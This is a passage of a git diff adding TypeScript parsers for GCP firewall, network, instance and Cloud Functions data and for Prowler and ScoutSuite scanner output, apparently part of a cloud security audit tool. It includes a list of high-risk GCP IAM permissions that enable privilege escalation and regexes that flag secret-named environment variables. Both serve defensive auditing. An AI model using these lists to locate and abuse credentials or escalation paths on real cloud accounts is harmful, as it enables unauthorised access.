+   * Parse GCP firewall rules output.
+   */
+  export function parseFirewallRules(output: string): CloudScanTypes.SecurityGroup[] {
+    try {
+      const rules = JSON.parse(output)
+
+      // Group rules by network
+      const byNetwork = new Map<string, any[]>()
+      for (const rule of Array.isArray(rules) ? rules : []) {
+        const network = rule.network?.split("/").pop() || "default"
+        if (!byNetwork.has(network)) {
+          byNetwork.set(network, [])
+        }
+        byNetwork.get(network)!.push(rule)
+      }
+
+      const groups: CloudScanTypes.SecurityGroup[] = []
+
+      for (const [network, networkRules] of byNetwork) {
+        const parsedRules = networkRules.flatMap((rule: any) => parseGCPFirewallRule(rule))
+        const hasPublicIngress = parsedRules.some((r) => r.direction === "inbound" && r.isPublic)
+        const hasUnrestrictedIngress = parsedRules.some(
+          (r) => r.direction === "inbound" && r.isPublic && !r.portRange
+        )
+
+        groups.push({
+          id: network,
+          name: network,
+          provider: "gcp" as const,
+          description: `Firewall rules for network: ${network}`,
+          vpcId: network,
+          rules: parsedRules,
+          attachedResources: [],
+          hasPublicIngress,
+          hasUnrestrictedIngress,
+          issues: [],
+          tags: [],
+        })
+      }
+
+      return groups
+    } catch (err) {
+      log.error("Failed to parse GCP firewall rules", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse GCP VPC networks output.
+   */
+  export function parseVPCNetworks(output: string): CloudScanTypes.VirtualNetwork[] {
+    try {
+      const networks = JSON.parse(output)
+
+      return (Array.isArray(networks) ? networks : []).map((network: any) => ({
+        id: network.id || network.name,
+        name: network.name,
+        provider: "gcp" as const,
+        cidrBlock: "", // GCP VPCs use subnets for CIDRs
+        isDefault: network.name === "default",
+        subnets: (network.subnetworks || []).map((s: string) => s.split("/").pop()),
+        securityGroups: [],
+        flowLogsEnabled: false, // Check per subnet
+        issues: [],
+      }))
+    } catch (err) {
+      log.error("Failed to parse GCP VPC networks", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse GCP subnets output.
+   */
+  export function parseSubnets(output: string): Array<{
+    name: string
+    network: string
+    region: string
+    cidr: string
+    flowLogsEnabled: boolean
+  }> {
+    try {
+      const subnets = JSON.parse(output)
+
+      return (Array.isArray(subnets) ? subnets : []).map((subnet: any) => ({
+        name: subnet.name,
+        network: subnet.network?.split("/").pop() || "",
+        region: subnet.region?.split("/").pop() || "",
+        cidr: subnet.ipCidrRange || "",
+        flowLogsEnabled: subnet.logConfig?.enable ?? false,
+      }))
+    } catch (err) {
+      log.error("Failed to parse GCP subnets", { error: String(err) })
+      return []
+    }
+  }
+
+  // ========== Compute Parsing ==========
+
+  /**
+   * Parse GCE instances output.
+   */
+  export function parseInstances(output: string): CloudScanTypes.ComputeInstance[] {
+    try {
+      const instances = JSON.parse(output)
+
+      return (Array.isArray(instances) ? instances : []).map((instance: any) => {
+        const networkInterface = instance.networkInterfaces?.[0]
+        const publicIp = networkInterface?.accessConfigs?.[0]?.natIP
+
+        return {
+          id: instance.id?.toString() || instance.name,
+          name: instance.name,
+          provider: "gcp" as const,
+          region: instance.zone?.split("/").pop(),
+          instanceType: instance.machineType?.split("/").pop(),
+          state: mapGCEState(instance.status),
+          publicIp,
+          privateIp: networkInterface?.networkIP,
+          vpcId: networkInterface?.network?.split("/").pop(),
+          subnetId: networkInterface?.subnetwork?.split("/").pop(),
+          securityGroups: instance.tags?.items || [],
+          iamRole: instance.serviceAccounts?.[0]?.email,
+          publiclyAccessible: !!publicIp,
+          imdsV2Required: false, // GCP uses different metadata service
+          encryptedVolumes: instance.disks?.every((d: any) => d.diskEncryptionKey) ?? false,
+          issues: [],
+          tags: Object.entries(instance.labels || {}).map(([key, value]) => ({
+            key,
+            value: String(value),
+          })),
+        }
+      })
+    } catch (err) {
+      log.error("Failed to parse GCE instances", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse Cloud Functions output.
+   */
+  export function parseCloudFunctions(output: string): CloudScanTypes.ServerlessFunction[] {
+    try {
+      const functions = JSON.parse(output)
+
+      return (Array.isArray(functions) ? functions : []).map((fn: any) => ({
+        id: fn.name?.split("/").pop() || fn.name,
+        arn: fn.name,
+        name: fn.name?.split("/").pop() || fn.name,
+        provider: "gcp" as const,
+        region: fn.name?.split("/")[3],
+        runtime: fn.runtime,
+        handler: fn.entryPoint,
+        role: fn.serviceAccountEmail,
+        vpcConfig: fn.vpcConnector
+          ? {
+              vpcId: fn.vpcConnector,
+              subnetIds: [],
+              securityGroupIds: [],
+            }
+          : undefined,
+        publiclyAccessible: fn.httpsTrigger && !fn.httpsTrigger.securityLevel,
+        envVarsWithSecrets: detectSecretsInEnv(fn.environmentVariables || {}),
+        hasResourcePolicy: false,
+        issues: [],
+        tags: Object.entries(fn.labels || {}).map(([key, value]) => ({
+          key,
+          value: String(value),
+        })),
+      }))
+    } catch (err) {
+      log.error("Failed to parse Cloud Functions", { error: String(err) })
+      return []
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  function parseGCPFirewallRule(rule: any): CloudScanTypes.SecurityGroupRule[] {
+    const results: CloudScanTypes.SecurityGroupRule[] = []
+    const direction = rule.direction?.toLowerCase() === "egress" ? "outbound" : "inbound"
+    const sources = rule.sourceRanges || rule.destinationRanges || []
+
+    for (const source of sources) {
+      const isPublic = CloudScanTypes.PUBLIC_CIDRS.includes(source)
+
+      // Parse allowed rules
+      for (const allowed of rule.allowed || []) {
+        const protocol = allowed.IPProtocol || "*"
+        const ports = allowed.ports || []
+
+        if (ports.length === 0) {
+          results.push({
+            direction,
+            protocol,
+            source,
+            description: rule.description,
+            isPublic: direction === "inbound" && isPublic,
+            issues: [],
+          })
+        } else {
+          for (const port of ports) {
+            results.push({
+              direction,
+              protocol,
+              portRange: parsePortRange(port),
+              source,
+              description: rule.description,
+              isPublic: direction === "inbound" && isPublic,
+              issues: [],
+            })
+          }
+        }
+      }
+
+      // Parse denied rules (less common but possible)
+      for (const denied of rule.denied || []) {
+        const protocol = denied.IPProtocol || "*"
+        const ports = denied.ports || []
+
+        if (ports.length === 0) {
+          results.push({
+            direction,
+            protocol,
+            source,
+            description: `DENY: ${rule.description || ""}`,
+            isPublic: direction === "inbound" && isPublic,
+            issues: [],
+          })
+        } else {
+          for (const port of ports) {
+            results.push({
+              direction,
+              protocol,
+              portRange: parsePortRange(port),
+              source,
+              description: `DENY: ${rule.description || ""}`,
+              isPublic: direction === "inbound" && isPublic,
+              issues: [],
+            })
+          }
+        }
+      }
+    }
+
+    return results
+  }
+
+  function parsePortRange(port: string): { from: number; to: number } | undefined {
+    if (!port) return undefined
+
+    if (port.includes("-")) {
+      const [from, to] = port.split("-").map(Number)
+      return { from, to }
+    }
+
+    const portNum = parseInt(port, 10)
+    if (!isNaN(portNum)) {
+      return { from: portNum, to: portNum }
+    }
+
+    return undefined
+  }
+
+  function mapGCSAccessLevel(uniformAccess: boolean | undefined): CloudScanTypes.AccessLevel {
+    // GCS with uniform bucket-level access is typically more private
+    return uniformAccess ? "private" : "authenticated"
+  }
+
+  function mapGCEState(status: string | undefined): CloudScanTypes.ComputeInstance["state"] {
+    switch (status?.toUpperCase()) {
+      case "RUNNING":
+        return "running"
+      case "STOPPED":
+      case "TERMINATED":
+        return "stopped"
+      case "STAGING":
+      case "PROVISIONING":
+      case "STOPPING":
+      case "SUSPENDING":
+        return "pending"
+      default:
+        return "unknown"
+    }
+  }
+
+  function analyzeGCPRolePermissions(permissions: string[]): string[] {
+    const issues: string[] = []
+
+    const highRiskPatterns = [
+      "iam.serviceAccountKeys.create",
+      "iam.serviceAccounts.actAs",
+      "iam.serviceAccounts.getAccessToken",
+      "iam.serviceAccounts.signBlob",
+      "compute.instances.setServiceAccount",
+      "cloudfunctions.functions.setIamPolicy",
+      "storage.buckets.setIamPolicy",
+      "resourcemanager.projects.setIamPolicy",
+    ]
+
+    for (const perm of permissions) {
+      if (perm.endsWith("*")) {
+        issues.push(`Wildcard permission: ${perm}`)
+      }
+      for (const pattern of highRiskPatterns) {
+        if (perm === pattern || perm.startsWith(pattern.replace("*", ""))) {
+          issues.push(`High-risk permission: ${perm}`)
+        }
+      }
+    }
+
+    return issues
+  }
+
+  function detectSecretsInEnv(env: Record<string, string>): string[] {
+    const secretPatterns = [
+      /password/i,
+      /secret/i,
+      /api_key/i,
+      /apikey/i,
+      /token/i,
+      /credential/i,
+      /private_key/i,
+    ]
+
+    return Object.keys(env).filter((key) =>
+      secretPatterns.some((pattern) => pattern.test(key))
+    )
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/parsers/index.ts b/packages/opencode/src/pentest/cloudscan/parsers/index.ts
new file mode 100644
index 00000000000..a6a382488df
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/parsers/index.ts
@@ -0,0 +1,13 @@
+/**
+ * @fileoverview Cloud Scanner Parsers
+ *
+ * Parsers for cloud CLI tools and security scanner output.
+ *
+ * @module pentest/cloudscan/parsers
+ */
+
+export { AWSCLIParser } from "./aws-cli"
+export { AzureCLIParser } from "./azure-cli"
+export { GCloudParser } from "./gcloud"
+export { ProwlerParser } from "./prowler"
+export { ScoutSuiteParser } from "./scoutsuite"
diff --git a/packages/opencode/src/pentest/cloudscan/parsers/prowler.ts b/packages/opencode/src/pentest/cloudscan/parsers/prowler.ts
new file mode 100644
index 00000000000..89695d32120
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/parsers/prowler.ts
@@ -0,0 +1,364 @@
+/**
+ * @fileoverview Prowler Output Parser
+ *
+ * Parses JSON output from Prowler security tool.
+ *
+ * @module pentest/cloudscan/parsers/prowler
+ */
+
+import { CloudScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "cloudscan.parser.prowler" })
+
+/**
+ * Prowler parser namespace.
+ */
+export namespace ProwlerParser {
+  /**
+   * Parse Prowler JSON output.
+   */
+  export function parse(output: string): CloudScanTypes.ProwlerFinding[] {
+    try {
+      // Prowler can output as JSON lines or as a JSON array
+      const lines = output.trim().split("\n")
+      const findings: CloudScanTypes.ProwlerFinding[] = []
+
+      for (const line of lines) {
+        if (!line.trim()) continue
+
+        try {
+          const parsed = JSON.parse(line)
+
+          // Handle both single finding and array formats
+          if (Array.isArray(parsed)) {
+            findings.push(...parsed.map(normalizeFinding))
+          } else {
+            findings.push(normalizeFinding(parsed))
+          }
+        } catch {
+          // Skip invalid JSON lines
+        }
+      }
+
+      return findings
+    } catch (err) {
+      log.error("Failed to parse Prowler output", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Convert Prowler findings to CloudFindings.
+   */
+  export function toCloudFindings(
+    prowlerFindings: CloudScanTypes.ProwlerFinding[],
+    provider: CloudScanTypes.CloudProvider = "aws"
+  ): CloudScanTypes.CloudFinding[] {
+    return prowlerFindings
+      .filter((f) => f.status === "FAIL" || f.status === "WARNING")
+      .map((finding) => ({
+        id: `prowler_${finding.checkId}_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+        provider,
+        region: finding.region,
+        account: finding.accountId,
+        severity: mapSeverity(finding.severity),
+        title: finding.checkTitle,
+        description: finding.statusExtended || finding.checkTitle,
+        resourceType: mapService(finding.service),
+        resourceId: finding.resourceId,
+        resourceArn: finding.resourceArn,
+        category: mapCategory(finding.service),
+        complianceFrameworks: extractComplianceFrameworks(finding.compliance),
+        remediation: finding.remediation,
+        references: [],
+        rawData: finding,
+        foundAt: Date.now(),
+        source: "prowler" as const,
+      }))
+  }
+
+  /**
+   * Get compliance summary from Prowler findings.
+   */
+  export function getComplianceSummary(
+    findings: CloudScanTypes.ProwlerFinding[]
+  ): Record<string, { passed: number; failed: number; total: number }> {
+    const summary: Record<string, { passed: number; failed: number; total: number }> = {}
+
+    for (const finding of findings) {
+      if (!finding.compliance) continue
+
+      for (const [framework, controls] of Object.entries(finding.compliance)) {
+        if (!summary[framework]) {
+          summary[framework] = { passed: 0, failed: 0, total: 0 }
+        }
+
+        summary[framework].total++
+
+        if (finding.status === "PASS") {
+          summary[framework].passed++
+        } else if (finding.status === "FAIL") {
+          summary[framework].failed++
+        }
+      }
+    }
+
+    return summary
+  }
+
+  /**
+   * Group findings by service.
+   */
+  export function groupByService(
+    findings: CloudScanTypes.ProwlerFinding[]
+  ): Record<string, CloudScanTypes.ProwlerFinding[]> {
+    const grouped: Record<string, CloudScanTypes.ProwlerFinding[]> = {}
+
+    for (const finding of findings) {
+      const service = finding.service || "unknown"
+      if (!grouped[service]) {
+        grouped[service] = []
+      }
+      grouped[service].push(finding)
+    }
+
+    return grouped
+  }
+
+  /**
+   * Group findings by severity.
+   */
+  export function groupBySeverity(
+    findings: CloudScanTypes.ProwlerFinding[]
+  ): Record<string, CloudScanTypes.ProwlerFinding[]> {
+    const grouped: Record<string, CloudScanTypes.ProwlerFinding[]> = {
+      critical: [],
+      high: [],
+      medium: [],
+      low: [],
+      informational: [],
+    }
+
+    for (const finding of findings) {
+      const severity = finding.severity?.toLowerCase() || "informational"
+      if (grouped[severity]) {
+        grouped[severity].push(finding)
+      } else {
+        grouped.informational.push(finding)
+      }
+    }
+
+    return grouped
+  }
+
+  /**
+   * Get statistics from Prowler findings.
+   */
+  export function getStats(findings: CloudScanTypes.ProwlerFinding[]): {
+    total: number
+    passed: number
+    failed: number
+    warnings: number
+    info: number
+    bySeverity: Record<string, number>
+    byService: Record<string, number>
+  } {
+    const stats = {
+      total: findings.length,
+      passed: 0,
+      failed: 0,
+      warnings: 0,
+      info: 0,
+      bySeverity: {} as Record<string, number>,
+      byService: {} as Record<string, number>,
+    }
+
+    for (const finding of findings) {
+      // Count by status
+      switch (finding.status) {
+        case "PASS":
+          stats.passed++
+          break
+        case "FAIL":
+          stats.failed++
+          break
+        case "WARNING":
+          stats.warnings++
+          break
+        case "INFO":
+          stats.info++
+          break
+      }
+
+      // Count by severity
+      const severity = finding.severity?.toLowerCase() || "unknown"
+      stats.bySeverity[severity] = (stats.bySeverity[severity] || 0) + 1
+
+      // Count by service
+      const service = finding.service || "unknown"
+      stats.byService[service] = (stats.byService[service] || 0) + 1
+    }
+
+    return stats
+  }
+
+  /**
+   * Parse raw Prowler output and convert to CloudFindings.
+   */
+  export function parseOutput(
+    output: string,
+    provider: CloudScanTypes.CloudProvider = "aws"
+  ): CloudScanTypes.CloudFinding[] {
+    const prowlerFindings = parse(output)
+    return toCloudFindings(prowlerFindings, provider)
+  }
+
+  /**
+   * Format findings for display.
+   */
+  export function format(findings: CloudScanTypes.ProwlerFinding[], options?: {
+    includePass?: boolean
+    maxFindings?: number
+  }): string {
+    const lines: string[] = []
+    const { includePass = false, maxFindings = 100 } = options || {}
+
+    let filtered = findings
+    if (!includePass) {
+      filtered = findings.filter((f) => f.status !== "PASS")
+    }
+
+    const limited = filtered.slice(0, maxFindings)
+
+    for (const finding of limited) {
+      const status = finding.status === "PASS" ? "[PASS]" :
+        finding.status === "FAIL" ? "[FAIL]" :
+        finding.status === "WARNING" ? "[WARN]" : "[INFO]"
+
+      const severity = finding.severity ? `[${finding.severity}]` : ""
+
+      lines.push(`${status}${severity} ${finding.checkId}: ${finding.checkTitle}`)
+
+      if (finding.statusExtended) {
+        lines.push(`  ${finding.statusExtended}`)
+      }
+
+      if (finding.resourceArn || finding.resourceId) {
+        lines.push(`  Resource: ${finding.resourceArn || finding.resourceId}`)
+      }
+
+      if (finding.remediation) {
+        lines.push(`  Remediation: ${finding.remediation}`)
+      }
+
+      lines.push("")
+    }
+
+    if (filtered.length > maxFindings) {
+      lines.push(`... and ${filtered.length - maxFindings} more findings`)
+    }
+
+    return lines.join("\n")
+  }
+
+  // ========== Helper Functions ==========
+
+  function normalizeFinding(raw: any): CloudScanTypes.ProwlerFinding {
+    // Handle different Prowler output formats (v2 vs v3)
+    return {
+      checkId: raw.CheckID || raw.check_id || raw.checkId || "",
+      checkTitle: raw.CheckTitle || raw.check_title || raw.checkTitle || "",
+      status: normalizeStatus(raw.Status || raw.status || ""),
+      severity: raw.Severity || raw.severity || "",
+      service: raw.ServiceName || raw.service_name || raw.service || "",
+      region: raw.Region || raw.region || "",
+      accountId: raw.AccountId || raw.account_id || raw.accountId || "",
+      resourceId: raw.ResourceId || raw.resource_id || raw.resourceId || "",
+      resourceArn: raw.ResourceArn || raw.resource_arn || raw.resourceArn || "",
+      statusExtended: raw.StatusExtended || raw.status_extended || raw.statusExtended || "",
+      resourceDetails: raw.ResourceDetails || raw.resource_details || "",
+      risk: raw.Risk || raw.risk || "",
+      remediation: raw.Remediation?.Recommendation?.Text ||
+        raw.remediation?.recommendation?.text ||
+        raw.Remediation || raw.remediation || "",
+      compliance: raw.Compliance || raw.compliance || {},
+    }
+  }
+
+  function normalizeStatus(status: string): "PASS" | "FAIL" | "INFO" | "WARNING" {
+    const upper = status.toUpperCase()
+    if (upper === "PASS" || upper === "PASSED") return "PASS"
+    if (upper === "FAIL" || upper === "FAILED") return "FAIL"
+    if (upper === "WARNING" || upper === "WARN") return "WARNING"
+    return "INFO"
+  }
+
+  function mapSeverity(severity: string): CloudScanTypes.Severity {
+    const lower = severity?.toLowerCase() || ""
+    if (lower === "critical") return "critical"
+    if (lower === "high") return "high"
+    if (lower === "medium") return "medium"
+    if (lower === "low") return "low"
+    return "info"
+  }
+
+  function mapService(service: string): CloudScanTypes.ResourceType | undefined {
+    const lower = service?.toLowerCase() || ""
+
+    if (lower.includes("iam")) return "user"
+    if (lower.includes("s3")) return "bucket"
+    if (lower.includes("ec2")) return "instance"
+    if (lower.includes("lambda")) return "function"
+    if (lower.includes("rds") || lower.includes("database")) return "database"
+    if (lower.includes("vpc") || lower.includes("network")) return "vpc"
+    if (lower.includes("kms") || lower.includes("key")) return "key"
+    if (lower.includes("secrets") || lower.includes("ssm")) return "secret"
+
+    return "other"
+  }
+
+  function mapCategory(service: string): CloudScanTypes.CloudFinding["category"] {
+    const lower = service?.toLowerCase() || ""
+
+    if (lower.includes("iam")) return "iam"
+    if (lower.includes("s3") || lower.includes("storage")) return "storage"
+    if (lower.includes("vpc") || lower.includes("security") || lower.includes("network")) return "network"
+    if (lower.includes("ec2") || lower.includes("lambda") || lower.includes("compute")) return "compute"
+    if (lower.includes("kms") || lower.includes("encryption")) return "encryption"
+    if (lower.includes("cloudtrail") || lower.includes("logging") || lower.includes("cloudwatch")) return "logging"
+
+    return "configuration"
+  }
+
+  function extractComplianceFrameworks(
+    compliance: Record<string, string[]> | undefined
+  ): CloudScanTypes.ComplianceFramework[] {
+    if (!compliance) return []
+
+    const frameworks: CloudScanTypes.ComplianceFramework[] = []
+    const frameworkMap: Record<string, CloudScanTypes.ComplianceFramework> = {
+      cis: "cis",
+      nist: "nist",
+      "pci-dss": "pci-dss",
+      pci: "pci-dss",
+      hipaa: "hipaa",
+      soc2: "soc2",
+      gdpr: "gdpr",
+      iso27001: "iso27001",
+    }
+
+    for (const key of Object.keys(compliance)) {
+      const lower = key.toLowerCase()
+      for (const [pattern, framework] of Object.entries(frameworkMap)) {
+        if (lower.includes(pattern)) {
+          if (!frameworks.includes(framework)) {
+            frameworks.push(framework)
+          }
+        }
+      }
+    }
+
+    return frameworks
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/parsers/scoutsuite.ts b/packages/opencode/src/pentest/cloudscan/parsers/scoutsuite.ts
new file mode 100644
index 00000000000..53d10e6021a
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/parsers/scoutsuite.ts
@@ -0,0 +1,399 @@
+/**
+ * @fileoverview ScoutSuite Output Parser
+ *
+ * Parses JSON output from ScoutSuite security tool.
+ *
+ * @module pentest/cloudscan/parsers/scoutsuite
+ */
+
+import { CloudScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "cloudscan.parser.scoutsuite" })
+
+/**
+ * ScoutSuite parser namespace.
+ */
+export namespace ScoutSuiteParser {
+  /**
+   * ScoutSuite report structure.
+   */
+  interface ScoutSuiteReport {
+    provider_code: string
+    provider_name: string
+    account_id?: string
+    partition?: string
+    last_run?: {
+      time: string
+      run_parameters: Record<string, unknown>
+    }
+    services: Record<string, ServiceData>
+    metadata?: Record<string, unknown>
+  }
+
+  interface ServiceData {
+    findings: Record<string, FindingData>
+    [key: string]: unknown
+  }
+
+  interface FindingData {
+    description: string
+    path: string
+    level: "danger" | "warning" | "info"
+    items: string[]
+    flagged_items: number
+    checked_items: number
+    rationale?: string
+    remediation?: string
+    references?: string[]
+    compliance?: Array<{ name: string; reference?: string }>
+    dashboard_name?: string
+    display_path?: string
+  }
+
+  /**
+   * Parse ScoutSuite JSON report.
+   */
+  export function parse(output: string): CloudScanTypes.ScoutSuiteFinding[] {
+    try {
+      const report: ScoutSuiteReport = JSON.parse(output)
+      const findings: CloudScanTypes.ScoutSuiteFinding[] = []
+
+      for (const [serviceName, serviceData] of Object.entries(report.services || {})) {
+        if (!serviceData.findings) continue
+
+        for (const [checkId, findingData] of Object.entries(serviceData.findings)) {
+          findings.push({
+            checkId,
+            description: findingData.description || "",
+            level: findingData.level || "info",
+            service: serviceName,
+            path: findingData.path || "",
+            items: findingData.items || [],
+            flaggedItems: findingData.flagged_items || 0,
+            checkedItems: findingData.checked_items || 0,
+            rationale: findingData.rationale,
+            remediation: findingData.remediation,
+            references: findingData.references || [],
+            compliance: (findingData.compliance || []).map((c) => ({
+              name: c.name,
+              reference: c.reference,
+            })),
+          })
+        }
+      }
+
+      return findings
+    } catch (err) {
+      log.error("Failed to parse ScoutSuite output", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Parse ScoutSuite results.js file (JavaScript format).
+   */
+  export function parseResultsJs(content: string): CloudScanTypes.ScoutSuiteFinding[] {
+    try {
+      // ScoutSuite outputs results as: scoutsuite_results = {...}
+      const match = content.match(/scoutsuite_results\s*=\s*(\{[\s\S]*\})\s*;?\s*$/)
+      if (!match) {
+        log.error("Could not find scoutsuite_results in content")
+        return []
+      }
+
+      return parse(match[1])
+    } catch (err) {
+      log.error("Failed to parse ScoutSuite results.js", { error: String(err) })
+      return []
+    }
+  }
+
+  /**
+   * Convert ScoutSuite findings to CloudFindings.
+   */
+  export function toCloudFindings(
+    scoutFindings: CloudScanTypes.ScoutSuiteFinding[],
+    provider: CloudScanTypes.CloudProvider = "aws"
+  ): CloudScanTypes.CloudFinding[] {
+    return scoutFindings
+      .filter((f) => f.level === "danger" || f.level === "warning")
+      .filter((f) => f.flaggedItems > 0)
+      .map((finding) => ({
+        id: `scoutsuite_${finding.checkId}_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+        provider,
+        severity: mapLevel(finding.level),
+        title: finding.checkId.replace(/_/g, " ").replace(/\b\w/g, (c) => c.toUpperCase()),
+        description: finding.description,
+        resourceType: mapService(finding.service),
+        category: mapCategory(finding.service),
+        complianceFrameworks: extractComplianceFrameworks(finding.compliance),
+        remediation: finding.remediation,
+        references: finding.references,
+        rawData: finding,
+        foundAt: Date.now(),
+        source: "scoutsuite" as const,
+      }))
+  }
+
+  /**
+   * Parse raw ScoutSuite output and convert to CloudFindings.
+   */
+  export function parseOutput(
+    output: string,
+    provider: CloudScanTypes.CloudProvider = "aws"
+  ): CloudScanTypes.CloudFinding[] {
+    const scoutFindings = parse(output)
+    return toCloudFindings(scoutFindings, provider)
+  }
+
+  /**
+   * Get statistics from ScoutSuite findings.
+   */
+  export function getStats(findings: CloudScanTypes.ScoutSuiteFinding[]): {
+    total: number
+    danger: number
+    warning: number
+    info: number
+    flaggedResources: number
+    checkedResources: number
+    byService: Record<string, { danger: number; warning: number; info: number }>
+  } {
+    const stats = {
+      total: findings.length,
+      danger: 0,
+      warning: 0,
+      info: 0,
+      flaggedResources: 0,
+      checkedResources: 0,
+      byService: {} as Record<string, { danger: number; warning: number; info: number }>,
+    }
+
+    for (const finding of findings) {
+      // Count by level
+      switch (finding.level) {
+        case "danger":
+          stats.danger++
+          break
+        case "warning":
+          stats.warning++
+          break
+        case "info":
+          stats.info++
+          break
+      }
+
+      stats.flaggedResources += finding.flaggedItems
+      stats.checkedResources += finding.checkedItems
+
+      // Count by service
+      const service = finding.service || "unknown"
+      if (!stats.byService[service]) {
+        stats.byService[service] = { danger: 0, warning: 0, info: 0 }
+      }
+      stats.byService[service][finding.level]++
+    }
+
+    return stats
+  }
+
+  /**
+   * Group findings by service.
+   */
+  export function groupByService(
+    findings: CloudScanTypes.ScoutSuiteFinding[]
+  ): Record<string, CloudScanTypes.ScoutSuiteFinding[]> {
+    const grouped: Record<string, CloudScanTypes.ScoutSuiteFinding[]> = {}
+
+    for (const finding of findings) {
+      const service = finding.service || "unknown"
+      if (!grouped[service]) {
+        grouped[service] = []
+      }
+      grouped[service].push(finding)
+    }
+
+    return grouped
+  }
+
+  /**
+   * Group findings by level.
+   */
+  export function groupByLevel(
+    findings: CloudScanTypes.ScoutSuiteFinding[]
+  ): Record<string, CloudScanTypes.ScoutSuiteFinding[]> {
+    return {
+      danger: findings.filter((f) => f.level === "danger"),
+      warning: findings.filter((f) => f.level === "warning"),
+      info: findings.filter((f) => f.level === "info"),
+    }
+  }
+
+  /**
+   * Get findings with flagged items only.
+   */
+  export function getFlagged(
+    findings: CloudScanTypes.ScoutSuiteFinding[]
+  ): CloudScanTypes.ScoutSuiteFinding[] {
+    return findings.filter((f) => f.flaggedItems > 0)
+  }
+
+  /**
+   * Format findings for display.
+   */
+  export function format(findings: CloudScanTypes.ScoutSuiteFinding[], options?: {
+    includeInfo?: boolean
+    maxFindings?: number
+  }): string {
+    const lines: string[] = []
+    const { includeInfo = false, maxFindings = 100 } = options || {}
+
+    let filtered = findings.filter((f) => f.flaggedItems > 0)
+    if (!includeInfo) {
+      filtered = filtered.filter((f) => f.level !== "info")
+    }
+
+    // Sort by level (danger first)
+    filtered.sort((a, b) => {
+      const order = { danger: 0, warning: 1, info: 2 }
+      return order[a.level] - order[b.level]
+    })
+
+    const limited = filtered.slice(0, maxFindings)
+
+    for (const finding of limited) {
+      const level = finding.level === "danger" ? "[DANGER]" :
+        finding.level === "warning" ? "[WARNING]" : "[INFO]"
+
+      lines.push(`${level} ${finding.service}: ${finding.checkId}`)
+      lines.push(`  ${finding.description}`)
+      lines.push(`  Flagged: ${finding.flaggedItems}/${finding.checkedItems}`)
+
+      if (finding.rationale) {
+        lines.push(`  Rationale: ${finding.rationale}`)
+      }
+
+      if (finding.remediation) {
+        lines.push(`  Remediation: ${finding.remediation}`)
+      }
+
+      if (finding.items.length > 0 && finding.items.length <= 5) {
+        lines.push(`  Affected: ${finding.items.join(", ")}`)
+      } else if (finding.items.length > 5) {
+        lines.push(`  Affected: ${finding.items.slice(0, 5).join(", ")} ... and ${finding.items.length - 5} more`)
+      }
+
+      lines.push("")
+    }
+
+    if (filtered.length > maxFindings) {
+      lines.push(`... and ${filtered.length - maxFindings} more findings`)
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Extract affected resources from findings.
+   */
+  export function extractResources(
+    findings: CloudScanTypes.ScoutSuiteFinding[]
+  ): Array<{ service: string; resourceId: string; issues: string[] }> {
+    const resourceMap = new Map<string, { service: string; issues: string[] }>()
+
+    for (const finding of findings) {
+      if (finding.flaggedItems === 0) continue
+
+      for (const item of finding.items) {
+        const existing = resourceMap.get(item)
+        if (existing) {
+          existing.issues.push(finding.checkId)
+        } else {
+          resourceMap.set(item, {
+            service: finding.service,
+            issues: [finding.checkId],
+          })
+        }
+      }
+    }
+
+    return Array.from(resourceMap.entries()).map(([resourceId, data]) => ({
+      resourceId,
+      service: data.service,
+      issues: data.issues,
+    }))
+  }
+
+  // ========== Helper Functions ==========
+
+  function mapLevel(level: "danger" | "warning" | "info"): CloudScanTypes.Severity {
+    switch (level) {
+      case "danger":
+        return "high"
+      case "warning":
+        return "medium"
+      case "info":
+        return "info"
+    }
+  }
+
+  function mapService(service: string): CloudScanTypes.ResourceType | undefined {
+    const lower = service?.toLowerCase() || ""
+
+    if (lower === "iam" || lower === "sts") return "user"
+    if (lower === "s3") return "bucket"
+    if (lower === "ec2") return "instance"
+    if (lower === "lambda" || lower === "awslambda") return "function"
+    if (lower === "rds") return "database"
+    if (lower === "vpc") return "vpc"
+    if (lower === "kms") return "key"
+    if (lower === "secretsmanager" || lower === "ssm") return "secret"
+    if (lower === "elb" || lower === "elbv2") return "load-balancer"
+
+    return "other"
+  }
+
+  function mapCategory(service: string): CloudScanTypes.CloudFinding["category"] {
+    const lower = service?.toLowerCase() || ""
+
+    if (lower === "iam" || lower === "sts") return "iam"
+    if (lower === "s3") return "storage"
+    if (lower === "vpc" || lower === "ec2" && lower.includes("security")) return "network"
+    if (lower === "ec2" || lower === "lambda" || lower === "ecs") return "compute"
+    if (lower === "kms") return "encryption"
+    if (lower === "cloudtrail" || lower === "cloudwatch") return "logging"
+
+    return "configuration"
+  }
+
+  function extractComplianceFrameworks(
+    compliance: Array<{ name: string; reference?: string }> | undefined
+  ): CloudScanTypes.ComplianceFramework[] {
+    if (!compliance || compliance.length === 0) return []
+
+    const frameworks: CloudScanTypes.ComplianceFramework[] = []
+    const frameworkMap: Record<string, CloudScanTypes.ComplianceFramework> = {
+      cis: "cis",
+      nist: "nist",
+      "pci-dss": "pci-dss",
+      pci: "pci-dss",
+      hipaa: "hipaa",
+      soc2: "soc2",
+      gdpr: "gdpr",
+      iso: "iso27001",
+    }
+
+    for (const c of compliance) {
+      const lower = c.name.toLowerCase()
+      for (const [pattern, framework] of Object.entries(frameworkMap)) {
+        if (lower.includes(pattern)) {
+          if (!frameworks.includes(framework)) {
+            frameworks.push(framework)
+          }
+        }
+      }
+    }
+
+    return frameworks
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/profiles.ts b/packages/opencode/src/pentest/cloudscan/profiles.ts
new file mode 100644
index 00000000000..c8e6be1c1f3
--- /dev/null
